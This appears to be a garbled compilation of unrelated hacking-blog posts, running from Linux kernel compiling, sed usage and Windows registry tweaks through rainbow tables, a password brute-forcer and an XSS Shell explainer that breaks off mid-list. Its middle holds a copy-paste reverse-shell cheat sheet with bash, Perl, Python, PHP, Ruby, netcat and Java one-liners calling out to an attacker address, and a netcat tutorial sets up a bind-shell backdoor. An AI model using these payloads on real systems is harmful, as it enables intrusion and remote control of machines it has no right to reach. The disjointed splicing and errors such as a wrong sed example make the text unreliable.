1. Download the latest kernel from kernel.org

Code:

wget http://www.kernel.org/pub/linux/kernel/v2.4/linux-2.4.19.tar.gz tar zxvf linux-2.4.19.tar.gz cd linux-2.4.19

2. Configure the kernel options

This is where you select all the features you want to compile into the kernel (e.g. SCSI support, sound support, networking, etc.)

Code:

make menuconfig

There are different ways to configure what you want compiled into the kernel; if you have an existing configuration from an older kernel, copy the old .config file to the top level of your source and use make oldconfig instead of menuconfig. This oldconfig process will carry over your previous settings, and prompt you if there are new features not covered by your earlier .config file. This is the best way to 'upgrade' your kernel, especially among relatively close version numbers. Another possibility is make xconfig for a graphical version of menuconfig, if you are running X.

3. Make dependencies

After saving your configuration above (it is stored in the ".config" file) you have to build the dependencies for your chosen configuration. This takes about 5 minutes on a 500 MHz system.

Code:

make dep

4. Make the kernel

You can now compile the actual kernel. This can take about 15 minutes to complete on a 500 MHz system.

Code:

make bzImage

The resulting kernel file is "arch/i386/boot/bzImage"

5. Make the modules

Modules are parts of the kernel that are loaded on the fly, as they are needed. They are stored in individual files (e.g. ext3.o). The more modules you have, the longer this will take to compile:

Code:

make modules

6. Install the modules

This will copy all the modules to a new directory, "/lib/modules/a.b.c" where a.b.c is the kernel version

Code:

make modules_install

* In case you want to re-compile...

If you want to re-configure the kernel from scratch and re-compile it, you must also issue a couple "make" commands that clean intermediate files. Note that "make mrproper" deletes your .config file. The complete process is:

Code:

make mrproper make menuconfig make dep make clean make bzImage make modules make modules_install

* Installing and booting the new kernel

For the remainder of this discussion, I will assume that you have LILO installed on your boot sector. Throughout this process, always have a working bootable recovery floppy disk, and make backups of any files you modify or replace. A good trick is to name all new files with -a.b.c (kernel version suffix) instead of overwriting files with the same name, although this is not shown in the example that follows.

On most Linux systems, the kernels are stored in the /boot directory. Copy your new kernel to that location and give it a unique name.

Code:

cp arch/i386/boot/bzImage /boot/vmlinuz-2.4.19

There is also a file called "System.map" that must be copied to the same boot directory.

Code:

cp System.map /boot

Now you are ready to tell LILO about your new kernel. Edit "/etc/lilo.conf" as per your specific needs. Typically, your new entry in the .conf file will look like this:

Code:

image = /boot/vmlinuz-2.4.19 label = "Linux 2.4.19"

Make sure the image points to your new kernel. It is recommended you keep your previous kernel in the file; this way, if the new kernel fails to boot you can still select the old kernel from the lilo prompt.

Tell lilo to read the changes and modify your boot sector:

Code:

lilo -v

Read the output carefully to make sure the kernel files have been found and the changes have been made. You can now reboot.

Summary of important files created during kernel build:

Code:

.config (kernel configuration options, for future reference) arch/i386/boot/bzImage (actual kernel, copy to /boot/vmlinuz-a.b.c) System.map (map file, copy to /boot/System.map) /lib/modules/a.b.c (kernel modules)

Method 1: Protect all files within a folder
The NTFS file permission dictates that users who are granted Full Control on a folder can delete any files in that folder regardless of the permissions that protect the file. Hence to protect files in a folder from deletion, it is essential to deny Full Control on that folder. Once that permission is revoked, all files within that folder are automatically protected from deletion without having to set permission for each file individually. The steps required to do this is described below.

1. Create a folder on the root of an NTFS formatted hard drive partition. If the folder which you want to protect already exist and is nested several folders deep, it is recommended to move this folder to the root of the partition.

2. Right-click on the folder and choose Properties.

3. Click on the Security tab and then click Advanced.

4. Click Change Permission, and on the next window highlight Administrator and click Edit

5. Under Permission settings, check the boxes “Delete subfolders and files” and “Delete” under the Deny column.

6. Click OK on all opened windows until you have closed them all.

The folder is now protected. Under this folder you can create new files or edit existing files but you cannot delete them or rename them. Attempting to do so results in this File Access Denied message.

Method 2: Protect only selected files
This is somewhat difficult to achieve for reasons already explained – users who have full access to the parent folder can delete files regardless of the permissions that protect the file. So even if you deny Delete access to a file, if the parent folder is set to Full Access the user will be able to delete the file all the same. But there is one way by which we can workaround this problem.
1. Right-click on the file you want to protect and choose Properties.

2. Check the attribute “Read-only” and click Apply.

3. Open the Security tab and click Edit.

4. Highlight the user name Administrator and check the box “Write” under the column Deny.

5. Click OK on all windows to exit.

The file now cannot be deleted, but it cannot be edited or modified too. That’s an undesirable consequence of selectively protecting files.

Alternative Method: Use third party software:

If working with file permission is too much for you, you can try System Protect – a freeware that prevents deletion of important system files as well as user-selected files. The program runs in the background just like an anti-virus program do and continuously monitors all access to the protected files. If any process tries to delete the files the user is alerted. The program can be configured to automatically deny all delete attempts or ask the user for action. Additionally, System Protect allows files and folders to be password protected.

Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.

The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute ``` “/bin/sh -i”

Each of the methods below is aimed to be a one-liner that you can copy/paste.  As such they’re quite short lines, but not very readable.

Bash
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 16.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL: Here’s a shorter, feature-free version of the Perl-reverse-shell:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

There’s also an alternative PERL revere shell here.

Python This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

This code assumes that the TCP connection uses file descriptor 3.  This worked on my test system.  If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat: Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.

nc -e /bin/sh 10.0.0.1 1234

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Java

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor()

[Untested submission from an anonymous reader]

xterm

One of the simplest forms of the reverse shell is an xterm session.  The following command should be run on the server.  It will try to connect back to you (10.0.0.1) on TCP port 6001.

xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001).  One way to do this is with Xnest (to be run on your system):

Xnest :1

You’ll need to authorize the target to connect to you (the command also runs on your host):

xhost +targetip

Command:-

perl -pi -w -e 's/facebook/worldofhacker/g;' /home/krokite/*.txt

What basically above command does is, It will find the word facebook in each "text/notepad" file under the directory "/home/krokite" and will replace that with worldofhacker.

Subscribe to my blog, for more awesome tricks and hacks :)

Click on "Prev" or "Next" Button to Read

A debugger or debugging tool is a computer program that is used to test and debug other programs (the "target" program). The code to be examined might alternatively be running on an instruction set simulator (ISS), a technique that allows great power in its ability to halt when specific conditions are encountered but which will typically be somewhat slower than executing the code directly on the appropriate (or the same) processor. Some debuggers offer two modes of operation—full or partial simulation—to limit this impact.

A "crash" happens when the program cannot normally continue because of a programming bug. For example, the program might have tried to use an instruction not available on the current version of the CPU or attempted to access unavailable or protected memory. When the program "crashes" or reaches a preset condition, the debugger typically shows the location in the original code if it is a source-level debugger orsymbolic debugger, commonly now seen in integrated development environments. If it is a low-level debugger or a machine-language debugger it shows the line in the disassembly (unless it also has online access to the original source code and can display the appropriate section of code from the assembly or compilation).

Source :- Wikipedia

1. Basic "C++" program.
2. BruteForce Script in Python.

Here is Sample Code of CPP Program, that will need Password :-

Codes are messed up because of blogger. So Get a Code from here - https://github.com/krokite/basicBruteforce

/*
Author: KroKite
Description: Basic Bruteforcing Tools
*/

#include <iostream>
#include<cstdlib>
#include<cstring>
using namespace std;

// When passing char arrays as parameters they must be pointers
int main(int argc, char** argv) {
    if (argc < 4) { // Check the value of argc. If not enough parameters than, inform user and exit.
        cout << "Usage is " << argv[0] << " -f <input filename> -p password\n";
        exit(0);
    } else { // if we got enough parameters..
  int i=1;
    while(i<=argc) {
            if (strcmp(argv[i],"-f") == 0) {
            cout << "File to Open: " << argv[i + 1] << endl;
            }
        if (strcmp(argv[i],"-p") == 0) {
                cout <<"Password is : " << argv[i + 1] << endl;
            if(strcmp(argv[i+1], "KroKite") == 0) {
                cout << "File Opening SuccessFul"<< endl;
            } else {
                cout << "Wrong Password"<< endl;
            }
            }
    i++;
        }
    }
    return 0;
}

Compile the above program with g++

root@worldofhacker# g++ krokite.cpp -o krokite

and now run a program to understand what it will do,

root@worldofhacker# ./krokite
Usage is -f input\_filename -p password

So, Run with Arguments, and it takes the password with '-p' arguments:-

Giving the Wrong Password as "blackbuntu"

root@worldofhacker# ./krokite -f blackbuntu.txt -p blackbuntu
File to Open:  blackbuntu.txt
Password is : blackbuntu
Wrong Password

Now Running with Correct Password:-

root@worldofhacker# ./krokite -f blackbuntu.txt -p KroKite
File to Open:  blackbuntu.txt
Password is : KroKite
File Opening SuccessFul

But, Now what if you don't know the password of the program, and you need to open it, how would you do that, here is basic python code that will help you do that:-

Save the below file with the name "krokite.py"

#!/usr/bin/python
# Author : KroKite
# Description: Basic Password Bruteforcing Tool.
# Python Version: 2.7

import subprocess
import re

fo = open("password.txt", 'r');
for lines in fo:
  password = lines.split('\n')
    brute = subprocess.Popen(["./vulnerableApp", "-f", "foo.txt", "-p", password[0]], stdout=subprocess.PIPE)
    if(re.search("Success", brute.communicate()[0])):
        print "Password Cracked and your Password is ", password[0]
        exit()
    else:
        print password[0], " is not Password"

Now make another file which has a list of passwords, Write 1 password in 1 line.

password.txt file:-

abcdef
123456
hacker
bullshit
wtf
blackbuntu
facebook
twitter
metallica
KroKite
shit
password
pass

And now Run your python program:-

root@krokite# python krokite.py 
abcdef  is not Password
123456  is not Password
hacker  is not Password
bullshit  is not Password
wtf  is not Password
blackbuntu  is not Password
facebook  is not Password
twitter  is not Password
metallica  is not Password
Password Cracked and your Password is  KroKite

Note: Please Remember this is just a basic idea and does not account exactly for your program, you might have to do more homework for your application with the above krokite.py tool. With a Few Changes above krokite.py tool may work with MySQL [not tested]

krokite.py file reads 1 password at a time and then run your program with a fetched password and checks the success of the password, if it does, then it simply prints the password and exit, so the very last line will be your password if it has successfully cracked it.

Also, all the above Code is completely written by me, if you share it or modify it further, do include my credit. Thanks

Got Question? Ask them below, and I believe this simple demo will clear doubts.

Click on Image to See in Better Resolution

Go to this website. http://www.makelinux.net/kernel_map/

Click on Zoom, And Navigation to Learn More, about each file of Linux Kernel

at02:36

Email ThisBlogThis!Share to TwitterShare to Facebook

Labels: Kernel, Linux

A few times, we are in a situation, where we had to get rid of a few lines or Insert a few lines in the file.

For the given purpose, we will be using Linux sed command line utility app.

For Inserting or Updating any Data in a specific line

Syntax:

sed -i 'Ni CONTENT_HERE' filename

here N represents line number, i represents insert and CONTENT_HERE would be your actual content, filename will be the filename where you want to insert data

Example

sed -i '10i WorldOfHacker back in 2010 was one of the largest hacking communities in India and across the world' worldofhacker.txt

The above command will insert the WorldOfHacker back in 2010 was one of the largest hacking communities in India and across the world text on the 10th line of the worldofhacker.txt file.

You can try your own homework for various other lines

For Deleting any Data in a specific line

Syntax:

sed `Nd` filename

here, N represents as usual line number d represents the delete action and filename is your filename where you want to delete the N line number.

Example:

sed '10d' worldofhacker.txt

The above command will delete the 10th line from the file worldofhacker.txt

For Deleting any Data in the Last line

Syntax:

sed `$d` filename

here, $ represents the last line number d represents the delete action and filename is your filename where you want to delete the N line number.

Example:

sed '$d' worldofhacker.txt

The above command will delete the last line from the file worldofhacker.txt

For Deleting any Data based on a range of lines

Syntax:

sed `S,Ed` filename

here, S represents the first starting line number and E represents the last or end line number d represents the delete action and filename is your filename where you want to delete the range of line contents.

Example:

sed '4,7d' worldofhacker.txt

The above command will delete the line from the 4th index up to the 7th index of the file worldofhacker.txt

For Deleting multiple lines from Data

Syntax:

sed `Nd;Pd;Od;` filename

here, N, P, and O represent various line numbers, d represents the delete action and filename is your filename where you want to delete the range of line contents.

Example:

sed '4d;7d;10d' worldofhacker.txt

The above command will delete the line from the 4th index, 7th index, and 10th index of the file worldofhacker.txt

For Deleting multiple ranges of Reverse conditional Data

Syntax:

sed `N,P!d` filename

here, N, and P represent various line numbers, !d represents the delete action except for these lines, and filename is your filename where you want to delete the range of line contents except N-P.

Example:

sed '4,10d' worldofhacker.txt

The above command will delete the other line except for the 4th index to the 10th index of the file worldofhacker.txt

Hope this crazy method helps you save time. You can do more about them just do man sed and you will find why Linux is Love!

The MAKEDEV Script

Most device files will already be created and will be there ready to use after you install your Linux system. If by some chance you need to create one which is not provided then you should first try to use the MAKEDEV script. This script is usually located in /dev/MAKEDEV but might also have a copy (or a symbolic link) in /sbin/MAKEDEV. If it turns out not to be in your path then you will need to specify the path to it explicitly.

In general, the command is used as:

Quote:# /dev/MAKEDEV -v ttyS0
create ttyS0 c 4 64 root:dialout 0660

This will create the device file /dev/ttyS0 with major node 4 and minor node 64 as a character device with access permissions 0660 with owner root and group dialout.

ttyS0 is a serial port. The major and minor node numbers are numbers understood by the kernel. The kernel refers to hardware devices as numbers, this would be very difficult for us to remember, so we use filenames. Access permissions of 0660 means read and write permission for the owner (root in this case) and read and write permission for members of the group (dialout in this case) with no access for anyone else.

The mknod command

MAKEDEV is the preferred way of creating device files which are not present. However, sometimes the MAKEDEV script will not know about the device file you wish to create. This is where the mknod command comes in. In order to use mknod you need to know the major and minor node numbers for the device you wish to create. The devices.txt file in the kernel source documentation is the canonical source of this information.

To take an example, let us suppose that our version of the MAKEDEV script does not know how to create the /dev/ttyS0 device file. We need to use mknod to create it. We know from looking at the devices.txt that it should be a character device with major number 4 and minor number 64. So we now know all we need to create the file.

Quote:# mknod /dev/ttyS0 c 4 64
# chown root.dialout /dev/ttyS0
# chmod 0644 /dev/ttyS0
# ls -l /dev/ttyS0
crw-rw---- 1 root dialout 4, 64 Oct 23 18:23 /dev/ttyS0

As you can see, many more steps are required to create the file. In this example you can see the process required however. It is unlikely in the extreme that the ttyS0 file would not be provided by the MAKEDEV script, but it suffices to illustrate the point.

The lspci command

lspci

The lsdev command

lsdev

The lsusb command

lsusb

The lsraid command

lsraid

The hdparm command

hdparm

The lshw command

root@worldofhacker~# lshw

How to enable RUN ? if any viruses diabled your RUN, here’s the method to enable/disable RUN?

If you are a computer user,then you might habe also heard about virus!there are few virus which do havoc on prey computer and changes its behaviour drastically!I also use computer and had got some strange response from computer

for example when tried to hit “win+R” it shown a message stating that “Run has been disabled by administrator”. So i made a simple trick to solve this Problem.

Most of the viruses are now disabling the RUN command in Windows

This is achieving through the registry open the regedit.exe in your WINDOWS folder, then navigate to the following,

Quote:[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies

\Explorer]

“NoRun”=dword:1

Then change the DWORD value as 0 to enable , 1 to disable.
You can also do it through REG file( ie , file with extension .reg ) its code will be as like below.

Copy the below registry script and save it as a .reg file ( eg : dxm.reg )

Quote:REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies

\Explorer]

“NoRun”=dword:0

; 0 to enable

If you have any problem with the above methods the follow the below it will definitely work.

Save the below script as a bat file (eg: dxm.bat) and execute it ……Enjoy !!!!!!

Quote:ECHO REGEDIT4 > Enable-Run.REG

echo. >> Enable-Run.reg

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies

\Explorer] >> Enable-Run.reg

echo “NoRun”=dword:0 >> Enable-Run.reg

start /w regedit /s Enable-Run.reg

After running this file , a registry file is created with name “

Enable-Run

“, now just run this file and restart your computer , Now ur problem is solved!!!

Click on "Prev" or "Next" Button to Read

The first phase in security assessment is focused on collecting as much information as possible about a target application. Information Gathering is the most critical step of an application security test. The security test should endeavour to test as much of the code base as possible. Thus mapping all possible paths through the code to facilitate thorough testing is paramount.

This task can be carried out in many different ways.

By using public tools (search engines), scanners, sending simple HTTP requests, or specially crafted requests, it is possible to force the application to leak information, e.g., disclosing error messages or revealing the versions and technologies used.

Any Question ask them below ?

Yes, All Above Questions Will be Answered One by One Below, This is Pretty Basic Question in Newbie Hackers whenever they hear about Cracking Password. I am going to Cover some of the basics below so that People who are unaware of the fact can get glimpse of Rainbow Tables and Understands them.

What is Rainbow Tables ?

WikiPedia Wrote:A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering the plaintext password, up to a certain length consisting of a limited set of characters. It is a practical example of a space-time tradeoff, using more computer processing time at the cost of less storage when calculating a hash on every attempt, or less processing time and more storage when compared to a simple lookup table with one entry per hash. Use of a key derivation function that employ a salt makes this attack infeasible.

Rainbow tables are an application of an earlier, simpler algorithm by Martin Hellman.

Any computer system that requires password authentication must contain a database of passwords, either hashed or in plaintext, and various methods of password storage exist. Because the tables are vulnerable to theft, storing the plaintext password is dangerous. Most databases therefore store a cryptographic hash of a user's password in the database. In such a system, no one -- including the authentication system -- can determine what a user's password is, simply by looking at the value stored in the database. Instead, when a user enters his or her password for authentication, it is hashed and that output is compared to the stored entry for that user (which was hashed before being stored). If the two hashes match, access is granted.

A thief who steals the (hashed) password table cannot merely enter the user's (hashed) database entry to gain access since the authentication system would hash that a second time, producing a result which does not match the stored value, which was hashed only once. In order to learn a user's password, the thief must reverse the hash to find a password which produces the hashed value. A good authentication system will make this process as difficult as possible by using a one-way hash function, that has a high ratio for the time to invert the function compared to the time to compute the function.

Rainbow tables are one tool people have developed in an effort to derive a password by looking only at a hashed value.

In simple terms, passwords stored in computers are changed from their plain text form to an encrypted value. This value or hash is the result of an algorithmiccalculation designed for the operating system to use, but not to be plainly visible or intelligible to users. Let’s look at an example password and some associated hashes.

Below are Few Forms of Hashes for a word Hacker:-

Code:

plaintext : Hacker md4 : 3136853eb744ea85ae4f09a617625a70 md5 : 4baf5897963fc12d1cd8fe1a02eb48fb md5_md5 : 87ffde714866510526546ef9a1db19bb mysql3 : 3573c0604742c698 mysql4_mysql5: *af502ff2fbcd74e9f6b4d973f3968c044cd26f11 ntlm : de7b526765bf839416913f81f3d50541 ripemd160 : f88ac3e4c82d60d755e7fc5410d1a980bffe02a5 gost : 5ae2c723eba2b6dd1a5146b5c4e57dba740a4dc7c2e4b57ba7ced12476b86f84 sha1 : 2d7cd852faf790678785453124f3b4f5d5d25860 sha1_sha1 : ab74e27ff66c236b0762694f6a47b399738660bf sha224 : b452133a03f0212f9d506411a365757d1a8d89194b142d457d87435f sha256 : bda73679ff0137edc8e4ec93be4c9f59344a920e10958cf172d96643f9822f0a sha384 : 36af87a4a0b850d779834eb251a198486609ea5b6133ae9812bd62c758c06d94c86c58e1c107c9d6​0281a5c9fee0bd9b sha512 : faea6bd2bdea1bd4c5f1d0852f6c17ece1e41735bc05ea31485c90e9ae9d846bbbec197370f91b65​efd6bf5ee4f05e297af8d4456cc2f3738255abafd3134130 whirlpool : 67d4385f8c0651dd10ec909001f327f81dd43ec51bd3debbfe28499554b3f8d1af34d0a3e9c41181​a3615da6084c8920bfcf4fa8b6f2dd0fd217933996683041

Please Note Above is Just a Sample and does not contain complete list.

How to Use Rainbow Tables ?

You need 2 Things to do this :-

1. Small Application that can check against your Computed Hash [You can make your own too if you are programmer]
2. List of Hashes [This you can download from internet or torrent, you may find some pretty Good table list. ]
   One Good hash List can vary from 5GB - [50-100]GB

But you don't need for every hash. For an Example for Basic Hashes you can google online tools. Before you go and Do Search for Online tools, I would recommend you to understand about different hash format. Simple way to Know about them is with their size length. For an Instance :-

1. md4, md5 is 32 characters long.
2. sha1 is 40 characters long.
3. mysql3 used to be or if someone still uses them than it is 16 characters long.
4. mysql4/mysql5 are 41 characters long.
5. ntlm is 32 characters long too.
6. sha224 is 56 characters long.
7. sha256 is 64 characters long.
8. sha512 is 126 characters long.
9. crypt is 13 characters long.
   and list continues....

For Basic Md5, Sha1, Cracking Here are few famous Online tools :-

1. http://www.md5decrypter.co.uk
2. http://www.goog.li
3. http://www.md5decryption.com
4. http://www.md5decrypter.co.uk/sha1-decrypt.aspx
   and list continues...

Where to Download Rainbow Table List ?

1. http://www.freerainbowtables.com/en/tables2/
2. http://www.freerainbowtables.com/tables/

Follow the Link, Scroll through Middle of Page and you will see list of Table with Size Listed Aside.

Any Tools that can help Cracking Rainbow table :-

Here is 1 -> http://project-rainbowcrack.com/
Second Google is Your friend if you can't code one.

Few Links to Read More about Rainbow Tables :-

1. http://kestas.kuliukas.com/RainbowTables/
2. http://en.wikipedia.org/wiki/Rainbow_table
3. http://www.freerainbowtables.com/
4. http://www.rainbowtables.net/tutorials/b...orcing.php
   5. Start Googling for More, and if you find more Resource Please reply below on Comment, so that i can add them here in list.

Thanks and Good Luck

1. On your c:\ drive (root directory), you will find the following files:
LOGO.SYS startup screen LOGOS.SYS shutdown screen
LOGOW.SYS "wait to shutdown" screen

2. COPY these files to a place before attempting to alter them. You
may want to replace them if you decide or need to use them again.

3. Despite the .sys extensions, these files are standard bitmaps (.bmp files)
Once you've copied them, change the extension on one of your copies
to .bmp and view it in Ms.Paint Check the IMAGE, ATTRIBUTES
menu and note that it is 320 pixels (pels) wide and 400 pixels high.

4. Before you replace any of these images, you need to find or create,
or crop a bitmap image to 320 x 400. Choose your image, and set the
size in IMAGE, ATTRIBUTES in Ms.Paint.

5. Save your new image to the selected location, naming it after the logo file
you intend to replace (using the .sys extension).

6. Now, on the c:\ drive, change the extension of the original logo file
(the one you are replacing) to .bmp. This way, you'll have two originals
in case of trouble -one on your c:\ drive and one on you copied.

7. Now, move your new logo file into your root c:\ directory. The next
time you start up or shut down, you'll see your new screen.

8. If you don't like your new image, move it out of your root directory
and replace it with one of your original files (with the .sys extension).
Be sure to do this before you exit and re-enter Windows

1. What is Netcat?
2. Its Features.
3. Installation Method
4. Window's Box.
5. Linux Box.
6. Netcat One-Man Army.
7. Multiple Tool / Use Name.
8. Netcat as Chat Server.
9. Netcat as File Transfering Application.
10. Netcat as Port Scanning Tool.
11. Netcat as Banner Grabbing Machine.
12. Netcat as Backdoor / Remote Pwning - Granting Access to Create, Edit, Delete, and Break.
13. Netcat as System-in-Law Conclusion.

What is Netcat?

Netcat is a tool, which can read and write data across any TCP and UDP Network connections, Now, when it has a read and write mechanism for any TCP and UDP network connections, we can definitely juice out much stuff...

So, Let's See What its Features are:-

Some of Netcat’s features are:

• Outbound or inbound connections, TCP or UDP, to or from any ports.
• Full DNS forward/reverse checking, with appropriate warnings.
• Ability to use any local source port.
• Ability to use any locally-configured network source address.
• Built-in port-scanning capabilities, with randomizer.
• Built-in loose source-routing capability.
• Can read command line arguments from standard input.
• Slow-send mode, one line every N seconds.
• Hex dump of transmitted and received data.
• Optional ability to let another program service establish connections.
• Optional telnet-options responder.
• this list was listed on the vulnwatch.org website which no more exists.

So, After Getting to know all these features, you may want to give them a try, so how to get them and Install them.

Installation Method's

Google Search Results for Download Netcat, After you have downloaded them, How you can Run them:-

For Windows:-

• Unzip and Run your netcat.exe or nc.exe file, that's it,

For Linux:-

• Unzip and Go to Netcat Directory.

root@worldofhacker# make 
root@worldofhacker# make install
or
root@worldofhacker# apt-get install nc*
or
root@worldofhacker# yum install nc*

That's it, Now I assume you have running Netcat with you, so I will take you to Netcat Discovery Channel.

Netcat is one Alone Tool, that can do multiple Work, and all that work is not limited to are.

Netcat One-Man Army

1. Netcat as Chat Server.
2. Netcat as File Transfering Application.
3. Netcat as Port Scanning Tool.
4. Netcat as Banner Grabbing Machine.
5. Netcat as Backdoor/Remote Pwning - Granting Access to Create, Edit, Delete and S*.

So, Let's Discuss all those Features.

1. Netcat as Chat Server

System A:-

c:\> nc.exe -lvp 1234
or
krokite@worldofhacker~$ nc -lvp 1234    // This is for Linux system

System B:-

c:\> nc [system_A_ip] -vp 1234
or
krokite@worldofhacker~$ nc [system_A_ip] -vp 1234  // This is for Linux system

1. Netcat as File Transfering Application.

System A [Receiving the File]

c:\> nc.exe -l -p 1234 > worldofhacker.txt 
or
krokite@worldofhacker~$ nc -l -p 1234 > worldofhacker.txt

System B [Sending the File]

c:\>nc.exe [system_A_ip] -p 1234 > krokite.txt
or
krokite@worldofhacker~$ nc [system_A_ip] -p 1234 > krokite.txt

1. Netcat as Port Scanning Tool.

c:\> nc.exe -w2 -v -z [target_system_ip] 1-443
or 
krokite@worldofhacker~$ nc -w2 -v -z [target_system_ip] 1-443
or 
c:\> nc.exe -w2 -v -z [target_system_ip] 80,21,20,53,22,,25,110,143,443
or
krokite@worldofhacker~$ nc -w2 -v -z [target_system_ip] 80,21,20,53,22,25,110,143,443

• w means to wait.
• v means verbose mode, which means displaying the way program is processing.
• z is used for scanning purposes [Zero-I/O]
• 1-443 is port from 1 to 443, you can also specify 80,81,82,21,22,20,53, etc.

1. Netcat as Banner Grabbing Machine.

c:\> nc.exe -vvn [target_ip] [port_number]

krokite@worldofhacker~$ nc -vvn [target_ip] [port_number]

c:\> nc.exe -vvn 1.1.1.1 80
GET /HTTP 1.0/krokite@worldofhacker~$ nc -vvn 1.1.1.1 80
GET /HTTP 1.0/

Press 2 times enter after you send GET Request.

For port 80 i.e, HTTP Request, you need to send a method of Request like [GET, PUT, HEAD, etc.,]

you may change port 80 to 21 or any other than you don't have to type GET request.

if you want to use a domain name instead of IP then remove n from -vvn, just use as -vv

1. Netcat as Backdoor/Remote Pwning

System A

c:\> nc.exe -lp 1234 -e cmd.exe
or
krokite@worldofhacker~$ nc -lp 1234 -e /bin/bash

System B

c:\> nc.exe [system_A_ip] 1234
or
krokite@worldofhacker~$ nc [system_A_ip] 1234

System in Law - Conclusion

Hacking is Illegal, But Penetration testing with complete authority is legal. Do not use the Given knowledge to attack or Harm any person, if you do so, I [KroKite] or Worldofhacker.com will not be responsible for what you do with this knowledge.

That's it. Good Luck

Search more, explore more. Here are a few google outputs from my side:- Resource Center Google Search Results for Download Netcat Google Search Results for Netcat Swiff army knife

If you find some replies here with the link, will add them to the resource centre here:-

Any Questions Put them Below.

In This thread, we talk about in-depth descriptions of XSS tunneling. Source:- Internet & Few Security team Books.

INDEX

1). XSS Tunnelling

• What Is An XSS Tunnel?
• What Is XSS Tunnelling?
• What Is An XSS Channel?

XSS Shell

• How Does XSS Shell Work?
• Points of Interest
• Built-in Commands.
• Key Feature.
• Install.
• Why Is It Better Than The Classic XSS Attacks?

2). Why Tunnel HTTP Traffic Through An XSS Channel? 3). Benefits Of XSS Tunnelling 4). How Does XSS Tunnel Work? 5). An Attack Process.

What is an XSS tunnel?

XSS Tunnel is the standard HTTP proxy that sits on an attacker’s system. Any tool that is configured to use it will tunnel its traffic through the active XSS Channel on the XSS Shell server. The XSS Tunnel converts the request and responds transparently to validate the HTTP responses and XSS Shell requests. XSS Tunnel is written in .NET and requires .NET Framework to work. It is a GPL Licensed open source application.

What is an XSS Tunnelling?

XSS Tunnelling is the tunneling of HTTP traffic through an XSS Channel to use virtually any application that supports HTTP proxies.

What is an XSS Channel?

An XSS Channel is an interactive communication channel between two systems that is opened by an XSS attack. At a technical level, it is a type of AJAX application that can obtain commands, send responses back, and is able to talk cross-domain. The XSS Shell is a tool that can be used to set up an XSS Channel between a Slave and an attacker so that an attacker to control a Slave’s browser by sending it commands. This communication is bi-directional.

To get the XSS Shell to work an attacker needs to inject the XSS Shell’s JavaScript reference by way of an XSS attack. The attacker is then able to control the Slave’s browser. After this point, the attacker can see requests, and responses and is able to instruct the Slave’s browser to carry out requests, etc. A sample injection attack is shown below;

http://example.com/q=">

XSS Shell

XSS Shell is a powerful XSS backdoor and XSS zombie manager. This concept was first presented by "XSS-Proxy – http://xss-proxy.sourceforge.net/". Normally during XSS attacks, an attacker has one shot, however, an XSS Shell can be used interactively to send requests and receive responses from a Slave, it is also possible to backdoor the page and keep the connection open between the attacker and the Slave.

It is a good way of bypassing the following protections:

• Bypassing IP Restrictions
• NTLM / Basic Auth or any similar authentication
• Session-based custom protections.

How Does XSS Shell Work?

The XSS Shell is an application that has three main parts.

Firstly, the server-side part of the XSS Shell coordinates the XSS Shell between an attacker and the Slave. It is a server-side application and requires an ASP and IIS web server. It uses an MS Access database as storage.

The second part of the tool is client-side and written in JavaScript. This loads in the Slave’s browser and is responsible for the receiving and processing of commands together with providing the channel between the Slave and the attacker.

The final part of the XSS Shell is the administration interface. An attacker can send new commands and receive the responses from a Slave(s) browser instantly from this interface. Again it is ASP and requires IIS.

All of the following steps do not wait for each other and are constantly checking for responses and requests within specified time delays.

1. An attacker infects a website with a persistent or reflected (temporary) XSS attack which calls remote XSS Shell JavaScript.
2. The Slave follows or visits the page and executes the JavaScript within that domain.
3. The Slave’s browser begins to perform periodic requests to the XSS Shell Server and looks for new commands.
4. When the Slave browser receives a new command such as (Get Cookies, Execute custom JavaScript, Get Key logger Data, etc.) it is processed and returns the results to the XSS Shell.
5. The Attacker can push new commands to the Slave(s) browser and view the results from the XSS Shell administration interface.

Points of Interest

· XSS Shell communication relies on remote JavaScript loading in order to bypass the same-origin policy · In the first execution, XSS Shell re-generates the page. Thus even if the Slave follows; XSS Shell will remain on the page and therefore, allows the attacker to keep control of the Slave’s browser. As soon as the Slave obtains that window (even if the Slave follows a to another website) the Slave’s session will be open and the browser will follow an attacker’s commands. · It is open source and is quite easy to implement new commands such as port scanning. · XSS Shell is especially dangerous in permanent XSS vulnerabilities. Due the fact that an attacker can easily infect hundreds of browsers and manage them simultaneously.

Built-in Commands:

